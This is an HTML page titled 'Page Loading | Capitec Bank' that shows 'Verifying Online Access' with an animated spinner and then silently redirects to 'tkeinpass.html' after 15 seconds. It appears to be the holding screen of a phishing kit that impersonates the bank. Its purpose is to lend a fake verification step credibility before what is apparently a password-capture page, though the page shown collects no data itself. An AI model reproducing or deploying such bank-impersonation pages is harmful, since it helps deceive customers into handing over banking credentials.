<head>
<meta http-equiv="refresh" content="15;URL='tkeinpass.html'" /> 
<title>Page Loading | Capitec Bank</title>
</head>
<body style="margin-top: 160px;">
<div style="margin: 0 auto;">

<Center><div style="font-size: 15px; font-weight: 700; font-family: arial;">
Verifying Online Access
</div>
</center>
<div>


 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="margin: auto; background: rgba(255, 255, 255, 0); display: block;" width="200px" height="200px" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid">
<circle cx="62.6723" cy="57.3277" r="18" fill="#f29c98">
  <animate attributeName="cx" values="70;50" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="cy" values="50;70" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="fill" values="#f29c98;#f5b697" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
</circle><circle cx="42.6723" cy="62.6723" r="18" fill="#f5b697">
  <animate attributeName="cx" values="50;30" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="cy" values="70;50" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="fill" values="#f5b697;#f5e797" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
</circle><circle cx="37.3277" cy="42.6723" r="18" fill="#f5e797">
  <animate attributeName="cx" values="30;49.99999999999999" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="cy" values="50;30" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="fill" values="#f5e797;#a2e4f5" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
</circle><circle cx="57.3277" cy="37.3277" r="18" fill="#a2e4f5">
  <animate attributeName="cx" values="49.99999999999999;70" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="cy" values="30;49.99999999999999" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
  <animate attributeName="fill" values="#a2e4f5;#f29c98" keyTimes="0;1" dur="1s" repeatCount="indefinite"></animate>
</circle>
</svg>
 
 </div>
</div>
</body>